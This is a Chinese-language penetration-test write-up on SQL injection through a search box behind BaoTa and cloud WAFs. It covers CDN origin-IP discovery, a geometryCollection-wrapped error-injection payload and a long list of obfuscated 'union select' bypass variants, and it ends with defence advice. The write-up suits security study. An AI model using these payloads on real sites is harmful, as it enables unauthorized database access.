记一次SQL注入绕过宝塔+云waf
字数 911 2025-08-18 11:36:57

SQL注入绕过宝塔+云WAF实战技术文档

0x01 多重WAF环境分析

注入点识别

  • 目标点为搜索框
  • 通过单双引号测试确认注入类型为字符型
  • 环境存在双重防护:
    • 宝塔WAF
    • 云WAF

0x02 云WAF绕过技术

真实IP探测方法

  1. 全球Ping测试:通过全球不同节点ping目标域名,无回应的IP可能是CDN节点
  2. 历史解析记录:检查域名历史解析记录
  3. 空间搜索引擎
    • 使用FOFA/Hunter搜索真实IP
    • 注意云厂商IP段(如183.x.x.x)
  4. C段扫描:基于历史解析记录扫描同C段IP

云WAF拦截验证

  • 通过特定测试语句确认是否被云WAF拦截
  • 成功绕过云WAF后,可继续测试宝塔WAF

0x03 宝塔WAF绕过技术

1. 报错注入绕过

初始测试

  • 测试字符型注入:'||||''or+or'
  • 发现两个or之间出现内容即触发WAF

绕过思路

  • 尝试';%00方法
  • 测试--+注释符(有效)

报错函数测试

  • 常见报错函数被过滤:

    • extractvalue
    • updatexml
    • floor

  • 未过滤的几何函数:

    • Polygon
    • GeometryCollection
    • MultiPoint
    • MultiLineString

有效Payload构造

1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+

执行效果

  • 成功获取数据库名
  • 原理:利用未过滤的几何函数包裹被过滤的报错函数

2. 联合注入绕过

基础测试

  • 使用'order by x--+判断字段数
  • 确认17个字段正常,18个字段报错

Union Select Fuzz测试

测试了大量变形组合,包括但不限于:

/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect

有效Payload

union+distinctROW+select

执行效果

  • 成功绕过WAF执行联合查询
  • 可获取数据库信息

总结

关键绕过技术

  1. 云WAF绕过:通过真实IP探测避开CDN和云WAF
  2. 报错注入绕过:利用非常用几何函数包裹被过滤函数
  3. 联合注入绕过:通过大量变形测试找到未被过滤的union select组合

防御建议

  1. 对几何函数进行过滤
  2. 加强union select的变形检测
  3. 实施严格的输入过滤和参数化查询
  4. 定期更新WAF规则库

本技术文档详细记录了在实际渗透测试中绕过双重WAF的技术细节,可作为安全研究和防御加固的参考。

SQL注入绕过宝塔+云WAF实战技术文档 0x01 多重WAF环境分析 注入点识别 目标点为搜索框 通过单双引号测试确认注入类型为字符型 环境存在双重防护: 宝塔WAF 云WAF 0x02 云WAF绕过技术 真实IP探测方法 全球Ping测试 :通过全球不同节点ping目标域名,无回应的IP可能是CDN节点 历史解析记录 :检查域名历史解析记录 空间搜索引擎 : 使用FOFA/Hunter搜索真实IP 注意云厂商IP段(如183.x.x.x) C段扫描 :基于历史解析记录扫描同C段IP 云WAF拦截验证 通过特定测试语句确认是否被云WAF拦截 成功绕过云WAF后,可继续测试宝塔WAF 0x03 宝塔WAF绕过技术 1. 报错注入绕过 初始测试 测试字符型注入: '||||' 或 'or+or' 发现两个 or 之间出现内容即触发WAF 绕过思路 尝试 ';%00 方法 测试 --+ 注释符(有效) 报错函数测试 常见报错函数被过滤: extractvalue updatexml floor 未过滤的几何函数: Polygon GeometryCollection MultiPoint MultiLineString 有效Payload构造 执行效果 成功获取数据库名 原理:利用未过滤的几何函数包裹被过滤的报错函数 2. 联合注入绕过 基础测试 使用 'order by x--+ 判断字段数 确认17个字段正常,18个字段报错 Union Select Fuzz测试 测试了大量变形组合,包括但不限于: 有效Payload 执行效果 成功绕过WAF执行联合查询 可获取数据库信息 总结 关键绕过技术 云WAF绕过 :通过真实IP探测避开CDN和云WAF 报错注入绕过 :利用非常用几何函数包裹被过滤函数 联合注入绕过 :通过大量变形测试找到未被过滤的union select组合 防御建议 对几何函数进行过滤 加强union select的变形检测 实施严格的输入过滤和参数化查询 定期更新WAF规则库 本技术文档详细记录了在实际渗透测试中绕过双重WAF的技术细节,可作为安全研究和防御加固的参考。